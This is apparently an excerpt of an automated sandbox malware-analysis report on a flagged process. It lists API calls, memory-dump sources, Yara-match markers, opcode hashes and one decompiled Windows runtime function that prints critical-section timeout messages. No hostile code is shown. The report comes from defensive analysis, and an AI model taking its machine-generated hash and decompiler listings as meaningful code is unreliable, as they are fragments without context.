                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                  • Instruction ID: 10ee5b85ae83c309c1335805f61902fb9382c6df19648d67889ab667b41fd69f
                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                  • Instruction Fuzzy Hash: AEE01AB52002086BDB10DF89CC84EE777ADAF88650F018554FA085B241C930E8108BF5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(030E3516,?,030E3C8F,030E3C8F,?,030E3516,?,?,?,?,?,00000000,00000000,?), ref: 030E84BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                  • Instruction ID: 3f96646cd40fc0c0d7441a2fed9a20582a57cd5dd0cd0da7688cac9c00b34a6e
                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                  • Instruction Fuzzy Hash: 9FE012B6200208ABDB14EF99CC40EA777ACAF88650F118558FA085B241CA30F910CAB0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,030D7C63,?), ref: 030DD43B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Offset: 030D0000, based on PE: false
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                  • Instruction ID: 8b0d0e1d4971524f9c39dc6ddd793aec44d805183cd9722effd9ddafd2b61d74
                                                                                  • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                  • Instruction Fuzzy Hash: F7D0A7757903043BE610FBA89C03F6672CC5B54A00F4940A4F949DB3C3D950F4004561
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e55caffc22d83ddd0ac906e67a161ae1b8c016e62b62da27ee9c416e3ae4b9c2
                                                                                  • Instruction ID: 916b9f9cc9ec401eb6bbbfb989198c497c1f53530fd2980f76144736ef41a135
                                                                                  • Opcode Fuzzy Hash: e55caffc22d83ddd0ac906e67a161ae1b8c016e62b62da27ee9c416e3ae4b9c2
                                                                                  • Instruction Fuzzy Hash: 0BB09B729014C5C5E751D7605688B2F7E5177D1741F66C466D2020681A4778C091F5B5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  C-Code - Quality: 53%
                                                                                  			E0510FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                  				void* _t7;
                                                                                  				intOrPtr _t9;
                                                                                  				intOrPtr _t10;
                                                                                  				intOrPtr* _t12;
                                                                                  				intOrPtr* _t13;
                                                                                  				intOrPtr _t14;
                                                                                  				intOrPtr* _t15;
                                                                                  
                                                                                  				_t13 = __edx;
                                                                                  				_push(_a4);
                                                                                  				_t14 =  *[fs:0x18];
                                                                                  				_t15 = _t12;
                                                                                  				_t7 = E050BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                  				_push(_t13);
                                                                                  				E05105720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                  				_t9 =  *_t15;
                                                                                  				if(_t9 == 0xffffffff) {
                                                                                  					_t10 = 0;
                                                                                  				} else {
                                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                  				}
                                                                                  				_push(_t10);
                                                                                  				_push(_t15);
                                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                  				return E05105720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                  			}











                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0510FDFA
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0510FE01
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0510FE2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000E.00000002.495692173.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: true
                                                                                  • Associated: 0000000E.00000002.496050799.000000000516B000.00000040.00000001.sdmp
                                                                                  • Associated: 0000000E.00000002.496077545.000000000516F000.00000040.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                  • API String ID: 885266447-3903918235
                                                                                  • Opcode ID: 3d8c6b85e3c6ea1ed9e61492f6aa21e7832ca533809b5427898a8ff3a0d26205
                                                                                  • Instruction ID: e54de447d7c08d37536b771cea1f5a57a3e1227cae79fd50e742a39f8b6b9e34
                                                                                  • Opcode Fuzzy Hash: 3d8c6b85e3c6ea1ed9e61492f6aa21e7832ca533809b5427898a8ff3a0d26205
                                                                                  • Instruction Fuzzy Hash: 7BF0F636240201BFE6341A45DC4AF77BB5BEB44770F151314F6285A1D1DAA2F86096F0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%